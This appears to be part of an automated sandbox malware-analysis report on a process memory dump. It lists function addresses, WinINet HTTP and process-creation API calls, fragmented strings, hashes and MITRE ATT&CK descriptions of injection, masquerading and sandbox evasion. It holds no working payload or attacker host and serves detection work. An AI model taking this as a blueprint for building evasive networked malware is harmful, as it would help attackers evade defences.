HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00928938

Strings

HttpOpenRequestA, xrefs: 0092892A, 00928935
estA, xrefs: 009288FF
HttpOpenRequestA, xrefs: 009288DD
Http, xrefs: 009288EA
RequestA, xrefs: 00928932, 00928937
Requ, xrefs: 009288F8
Open, xrefs: 009288F1
OpenRequestA, xrefs: 0092892E, 00928936

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction ID: cedef2875322233de9bf3717e0c09fc0a025aefdfcb2b6250c800e4632436730
Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction Fuzzy Hash: 9301E9B2905119AFCB04DF98D841DEF7BBDEB48210F158288FD48A7205D630ED10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00928950, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 009289AC

Strings

Http, xrefs: 0092896A
HttpSendRequestA, xrefs: 0092895D
Send, xrefs: 00928971
estA, xrefs: 0092897F
HttpSendRequestA, xrefs: 0092899E, 009289A9
Requ, xrefs: 00928978
SendRequestA, xrefs: 009289A2, 009289AA
RequestA, xrefs: 009289A6, 009289AB

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction ID: 212cebbf1202de7ea442f9f508f70f6a62fe7e146aa993e6a21a784ec3d50dba
Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction Fuzzy Hash: D0014FB2905118AFCB00DF98D845ABF7BBCEB44210F158189FD08A7304D670EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009288C6, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 49networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00928938

Strings

HttpOpenRequestA, xrefs: 0092892A, 00928935
estA, xrefs: 009288FF
RequestA, xrefs: 00928932, 00928937
Http, xrefs: 009288EA
Requ, xrefs: 009288F8
Open, xrefs: 009288F1
OpenRequestA, xrefs: 0092892E, 00928936

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4071423757
Opcode ID: 87d47655fbcfca28d00692e721da07d5a0ce9ddf8e6860dc908fe1f8bcb7f116
Instruction ID: 1018d09670e9f18c334908af2816ab9b56fc409a2d88b7daca21e4191d9e30a0
Opcode Fuzzy Hash: 87d47655fbcfca28d00692e721da07d5a0ce9ddf8e6860dc908fe1f8bcb7f116
Instruction Fuzzy Hash: 0A014CB2505159AFCB14CF89D941AFB7BB9EB48250F168248F958AB245C73099018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00928850, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 009288B8

Strings

ConnectA, xrefs: 009288B2, 009288B7
ectA, xrefs: 0092887F
InternetConnectA, xrefs: 009288AA, 009288B5
rnetConnectA, xrefs: 009288AE, 009288B6
Conn, xrefs: 00928878
Inte, xrefs: 0092886A
rnet, xrefs: 00928871

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction ID: 1c534c0e399520ba227722533b70486fcf01b0830011c508d01ead4be11a848c
Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction Fuzzy Hash: 4D01E9B2905118AFCB14DF99D941EEF77BDEB48310F154289BE08A7245D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009287E0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00928837

Strings

rnetOpenA, xrefs: 00928831, 00928836
Open, xrefs: 00928808
A, xrefs: 0092880F
Inte, xrefs: 009287FA
InternetOpenA, xrefs: 0092882D, 00928835
rnet, xrefs: 00928801

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction ID: 4e0bbc30bd556c3a6220a250fdf351eaaec2fe3e845ac479dd919f77cd66de83
Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction Fuzzy Hash: CFF019B2901128AF8B14DF98EC419FBB7BCEF48310B048589BE1897305D634AE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009287D8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 39networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00928837

Strings

rnetOpenA, xrefs: 00928831, 00928836
Open, xrefs: 00928808
A, xrefs: 0092880F
Inte, xrefs: 009287FA
InternetOpenA, xrefs: 0092882D, 00928835
rnet, xrefs: 00928801

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 6fb47997aa88d04eda5a1bfc404bdb1a0e705a4eabc1b78d483696d70a7747df
Instruction ID: 730b50644e15882473e51b6583da19cff5d59d54b8cbc5703913db4d42c08536
Opcode Fuzzy Hash: 6fb47997aa88d04eda5a1bfc404bdb1a0e705a4eabc1b78d483696d70a7747df
Instruction Fuzzy Hash: 8AF069B2A01129AF9B04DF88D941DEF7BB9FF48340B048189FE185B315D630AA50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00928845, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 009288B8

Strings

InternetConnectA, xrefs: 009288AA, 009288B5
ConnectA, xrefs: 009288B2, 009288B7
rnetConnectA, xrefs: 009288AE, 009288B6

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: ConnectA$InternetConnectA$rnetConnectA
API String ID: 3050416762-2730666810
Opcode ID: d5218264eed17db6e4e24777e8726002cf8393744d7fe1e60e61fb97fe88f10c
Instruction ID: 94c4b736033fd31cf8461240471e344dcc79e45f0c3457fa7ac2ef1bfe081b1a
Opcode Fuzzy Hash: d5218264eed17db6e4e24777e8726002cf8393744d7fe1e60e61fb97fe88f10c
Instruction Fuzzy Hash: C2F0FE726011189FD714CE48D840DEB77AEAB8C710B558649FD1897348D630DC158BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00926EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00926F88

Strings

net.dll, xrefs: 00926F51, 00926FD7, 00926FAF, 00926FBB, 00926FE3
wininet.dll, xrefs: 00926F3E, 00926F47

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
Instruction ID: 6a2ce0043f0923adc67e712ba4994346237f35dd25c99b7ea93aed0b23f8c9a5
Opcode Fuzzy Hash: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
Instruction Fuzzy Hash: AC31C1B1602704ABC711DF68E9A1FA7B7B8FB88700F00851DF61A5B645D730B445CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00926EDA, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00926F88

Strings

net.dll, xrefs: 00926F51, 00926FAF, 00926FBB
wininet.dll, xrefs: 00926F3E, 00926F47

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 636f2d1f3370f00ff5ce866cdaaaabf78673c315276cd42163e036b40442d2a4
Instruction ID: 72b785721a08faf8aa3b3bfa89a31a3d242d7ce96a2e826d1a7a0e5143d3f32c
Opcode Fuzzy Hash: 636f2d1f3370f00ff5ce866cdaaaabf78673c315276cd42163e036b40442d2a4
Instruction Fuzzy Hash: AF21E1B1601300ABCB10DF68E9A1FABB7B8FB88300F00802DF6195B685D770A945CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 009284D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00913B93), ref: 009284FD

Strings

.z`, xrefs: 009284EC, 009284F8

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: d69d974773e469cc140de66b8dbe8fa007cdb13225a52e6ab1bd74a8d2bea850
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: D8E04FB12002146BD714DF59DC49EA777ACEF88750F014554FD0857281CA30F914CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00917260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009172BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009172DB

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: c5377d89cff4c3412a68137747f30b9ea7393747b00dd017a5f1163aefbd6944
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: F201A231A8022C77E720A6949C03FFEB76C9B80B50F554119FF04BA1C2E6A46A0687F6

Uniqueness

Uniqueness Score: -1.00%

Function 00917233, Relevance: 3.1, APIs: 2, Instructions: 52threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009172BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009172DB

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4803768af5a2d78e7dee54ffd316d8aa6a690ae8c324d4a1856824b45acc6fc7
Instruction ID: b855028416d24149f5048f36d4d78dbbb0a987569294df5410d3e23070e1afa8
Opcode Fuzzy Hash: 4803768af5a2d78e7dee54ffd316d8aa6a690ae8c324d4a1856824b45acc6fc7
Instruction Fuzzy Hash: 9F017D32B4152D77D720A6A4AC43FF9B36CAB40B11F58015AFE08DB2C1E6655D4682D1

Uniqueness

Uniqueness Score: -1.00%

Function 009172E3, Relevance: 3.0, APIs: 2, Instructions: 48threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009172BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009172DB

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b2c2e485d4bd4143457f4e20dd9cb1e258728f28b020ecfdc4626779d32835f2
Instruction ID: d85d0e192f9f6da971f7b68261a4b653675c60f2f82b7718ac1f761dbb29b647
Opcode Fuzzy Hash: b2c2e485d4bd4143457f4e20dd9cb1e258728f28b020ecfdc4626779d32835f2
Instruction Fuzzy Hash: 38F04C31B8062D77EB106680AC02FFEB7289B80B10F154249FF04BE1C1D6E8694647E5

Uniqueness

Uniqueness Score: -1.00%

Function 009285D5, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0091CFA2,0091CFA2,?,00000000,?,?), ref: 00928660

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d1566dc820442031c0b7b29f7879b9afeab30f159bfb8ef825fe3bdd84356171
Instruction ID: 54b190c3a6f32101a4c9b3cfc5b7696008607f17078065463b4bc9cea7a72f54
Opcode Fuzzy Hash: d1566dc820442031c0b7b29f7879b9afeab30f159bfb8ef825fe3bdd84356171
Instruction Fuzzy Hash: A9017CB52002086FDB14EF58DC81EEB73A9AF88344F118518FD4897342CA31E815CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00919B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00919B92

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 683108e5df422bd01b0b43dd976c1d76347f1130671b7a53cc777f8a17e5937b
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 7A011EB6E4020DABDF10DBA4EC52FDDB7B89B54308F004195A90897245F631EB54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0092853D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00928594

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: e2b3ce8800108a557a64704621d94b2eba52eca109b1d711f787a32a78d7f933
Instruction ID: 24cb8a19e5d8f84d83042d5cd2f958a67f61140541ae2538ae02ffdaf075b3a0
Opcode Fuzzy Hash: e2b3ce8800108a557a64704621d94b2eba52eca109b1d711f787a32a78d7f933
Instruction Fuzzy Hash: 4B019DB2210108AFCB58CF99DC81EEB77A9AF8C354F158258FA0DE7251C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00928540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00928594

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: dd4f3b1689fa08db70e560fe2b734b98da17bce8767273eb4e3c71d67e002133
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 9301AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00927003, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0091CCD0,?,?), ref: 0092704C

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 568c07f242c592475103e3f16555b1998be1e8b1b8eb94f8e9976592c86cfd01
Instruction ID: 04c1da06e9b36f12a44bd0bf7edcbd672af0d660aae054db68523b2096f3d1ed
Opcode Fuzzy Hash: 568c07f242c592475103e3f16555b1998be1e8b1b8eb94f8e9976592c86cfd01
Instruction Fuzzy Hash: 29F0E5363913503AE331266C9C03FA77B89DBD2B24F580259F64AAF2C6D595F8064295

Uniqueness

Uniqueness Score: -1.00%

Function 00927010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0091CCD0,?,?), ref: 0092704C

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
Instruction ID: 551da18c4d383353834467c62d8544815b1ae9d4fdf9c4c63c4d0046bad0a5f0
Opcode Fuzzy Hash: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
Instruction Fuzzy Hash: 91E06D333912143AE2306599AC02FA7B39C9B81B20F550026FA0DEA2C1D595F80142A5

Uniqueness

Uniqueness Score: -1.00%

Function 00928621, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0091CFA2,0091CFA2,?,00000000,?,?), ref: 00928660

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c4c12349f7843d4c95c896aebf4e8b7ec874d9d38be058e0a016e30f42c9c57d
Instruction ID: 6941d2fb0f826a047e2b38fbc3088ad85f3438130a2439fd3760dfde9011e86d
Opcode Fuzzy Hash: c4c12349f7843d4c95c896aebf4e8b7ec874d9d38be058e0a016e30f42c9c57d
Instruction Fuzzy Hash: 35F03075200114AFCB20DF55CCC5EDB776AEF88350F108654F90997346CA35E806CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00928490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00923516,?,00923C8F,00923C8F,?,00923516,?,?,?,?,?,00000000,00000000,?), ref: 009284BD

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 2c8c672d27b48db1e0ba46e2cdce05eb020213b822d386a4926a051d913a8a40
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 37E046B1200218ABDB14EF99DC45EA777ACEF88750F118558FE085B282CA30F914CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00928630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0091CFA2,0091CFA2,?,00000000,?,?), ref: 00928660

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 0fad4a4ed3319c433a045708dc2470d60f4007a7e41059830870550c8082abbc
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 4AE01AB12002186BDB10DF49DC85EE737ADAF88650F018554FA0857281C930E8148BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0091D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00917C63,?), ref: 0091D43B

Memory Dump Source

Source File: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: ed8a7d96799f84ea9f7a314ef63ea81a10656c5976bfe1d73f2c671d3f0bbf35
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 6CD0A7717503083BE610FBA89C03F6632CC5B54B00F494064F949D73C3D964F5004561

Uniqueness

Uniqueness Score: -1.00%

Function 04C1967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C19694

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 861d8a79baf591d73afe8504df6bccd6c4c9a99683778e45a08a89f1c16ae997
Instruction ID: d1d8f8883e5ee84bc298d4ffa4d20d80f40a4ac49385ad27bab8017123f6a01d
Opcode Fuzzy Hash: 861d8a79baf591d73afe8504df6bccd6c4c9a99683778e45a08a89f1c16ae997
Instruction Fuzzy Hash: 9BB09BF19015D5C5F751D76047087177A1177D1755F36C051D2030641A4778D191F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04C6FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04C6FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04C1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04C65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04C65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04c6fdda
0x04c6fde2
0x04c6fde5
0x04c6fdec
0x04c6fdfa
0x04c6fdff
0x04c6fe0a
0x04c6fe0f
0x04c6fe17
0x04c6fe1e
0x04c6fe19
0x04c6fe19
0x04c6fe19
0x04c6fe20
0x04c6fe21
0x04c6fe22
0x04c6fe25
0x04c6fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C6FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C6FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C6FE2B

Memory Dump Source

Source File: 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: true

Associated: 00000009.00000002.591054499.0000000004CCB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.591066208.0000000004CCF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 88b84fac3324c1f22df4112ae0eca913158b2d74d8fb9e898f755a724125b3ce
Instruction ID: 66706af22a7ea81cdf32b5418282b99a26f4b2488745a20406c3af125b534a96
Opcode Fuzzy Hash: 88b84fac3324c1f22df4112ae0eca913158b2d74d8fb9e898f755a724125b3ce
Instruction Fuzzy Hash: 29F0F632644601BFE7241A45EC82F23BF5BEB44730F244358F628565E1EA62F830A6F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

